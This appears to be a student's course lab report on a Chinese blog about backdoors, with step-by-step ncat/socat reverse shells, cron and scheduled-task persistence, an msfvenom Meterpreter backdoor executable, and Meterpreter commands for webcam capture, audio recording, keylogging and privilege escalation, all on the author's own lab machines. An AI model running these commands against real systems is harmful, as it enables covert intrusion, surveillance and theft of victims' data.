• 博客园logo
  • 会员
  • 众包
  • 新闻
  • 博问
  • 闪存
  • 赞助商
  • HarmonyOS
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录
20154330
博客园    首页    新随笔    联系   管理    订阅  订阅

Exp2后门原理与实践

一、简单后门

1、ncat、socat的基础操作

工具介绍:

netcat(nc、ncat)是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
socat:类似于Netcat的加强版。
以上两个工具均可以在老师课件主页的附件中下载++https://gitee.com/wildlinux/NetSec/attach_files++

Meterpreter:利用 Metaspolit 的 msfvenom 指令生成后门可执行文件。

操作内容:

1.1Windows与linux间获取Shell

1.1.1 Windows主机获取 Linux Shell
windows:

1、win主机查本机IP地址:ipconfig

由上图可见IPV4的地址为192.168.43.102

2、利用netcat.exe程序监听端口:4330

ps:我将解压好的ncat文件包和socat文件包放在了C:\Users\Mypc\Desktop\网络攻防实验二图片\ncat目录下,所以需要先cd到ncat目录下,然后输入ncat.exe -l -p 4330监听端口4330

kali:

1、使用nc 192.168.43.102 4330 -e /bin/sh指令反向连接Windows主机的4330端口:

2、windows执行linux shell的指令

此时,可以在cmd.exe下运行linux的指令

1.1.2Linux主机获取 Windows shell

linux:

1、查看kali的主机IP地址:ifconfig

上图可以看到kali的主机IP地址为192.168.29.129

2、输入nc -l -p 4330指令监听端口

windows:

1、在cmd窗口使用 ncat.exe -e cmd.exe 192.168.239.131 4305命令去连接Linux的4305端口。

2、Linux运行Windows shell

1.2Linux运行Windows shell

1.Windows输入指令ncat.exe -l 4330 监听

2.Linux输入指令nc 192.168.43.102 4305 连接win主机

3.双向传输字符串

1.3 ncat定时启动

1、Windows输入指令ncat.exe -l -p 4330监听

2、Linux输入指令crontab -e
,选择一个文本编辑器打开,在最后一行添加代码:10 * * * * /bin/netcat 192.168.43.102 4330 -e /bin/sh
在每小时的10分运行ncat回连win主机

3、时间一到就可以运行linux shell指令

1.4 socat 定时启动

1、在windows下依次打开控制面板-管理工具-任务计划,新建一个任务


2、新建触发器

3、新建操作

其中添加参数为:tcp-listen:4330 exec:cmd.exe,pty,stderr

4、运行任务

5、Linux输入指令 socat - tcp:192.168.43.102:4330
, windows主机IP、端口号,此时可以获取win的shell命令

二、体验 MSF Meterpreter 功能

2.1利用msfvenom指令生成后门程序

1、在Linux主机输入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.29.129 LPORT=4330 -f exe > 20154330_backdoor.exe

此条指令意为生成一个.exe程序,名称为 20154330_backdoor,将来在windows上运行时会回连到Linux主机相应端口

2、将生成文件拷贝到windows下(随意目录)

2.2进入控制台设置相关参数

1、linux输入指令msfconsole

2.在msf>下输入命令use exploit/multi/handler

3.输入set payload windows/meterpreter/reverse_tcp
设置payload

4.输入指令set LHOST 192.168.29.129

5.输入指令set LPORT 4330

6.输入指令show options

2.3开始监听

1、Linux输入指令exploit
开始监听

2.windows主机双击后门木马程序执行

3.1输入指令record_mic录制一段音频

3.2输入指令webcam_snap拍摄照片

3.3输入指令screenshot截取屏幕

3.4输入指令keyscan_start记录击键内容,输入指令keyscan_dump获取击键记录

3.5输入指令getuid查看当前用户,输入指令getsystem提权



三、问题

1.例举你能想到的一个后门进入到你系统中的可能方式?

从网络上下载非正版的软件安装包、压缩包
各种不明来历的信息,链接,还有一些小视频……
移动设备拷贝文件时携带

2.例举你知道的后门如何启动起来(win及linux)的方式?

后门程序与文件或程序绑定,打开文件或程序时,后门启动。
电脑开机时后门程序自动启动。

3.Meterpreter有哪些给你映像深刻的功能?

感觉它超级强大……每个功能都很让我印象深刻!开摄像头,屏幕截图,录音频……完全没有任何隐私,所以以后在软件的安装中要做到尽可能从正规渠道下载,对于一些不明来历的信息,链接不因好奇心而点击,减少系统被植入后门的危险。

4.如何发现自己有系统有没有被安装后门?

如果翻看任务管理器时,机器内存占用非常严重,关掉主要应用程序还是有占用,任务里有并不认识的exe程序,那很有可能就是被安装了后门。
使用杀毒软件,定时经常性的进行全盘查杀
下载文件进程的时候,设置防火墙

四、实验感想

本次实践主要是多种方法linux获取win的shell,winxp获取linux的shell。后门的简单学习,生成一个后门文件,安装在靶机中,控制靶机,就可以得到自己想要得到的信息。Meterpreter,功能很强大,通过实践,也意识到后门程序一旦被启动,那信息被盗取很容易。所以计算机没有绝对的安全,在使用时要避免打开一些不良的或者未知的文件。

posted @ 2018-03-29 21:59  20154330  阅读(282)  评论(0)    收藏  举报
刷新页面返回顶部
博客园  ©  2004-2025
浙公网安备 33010602011771号 浙ICP备2021040463号-3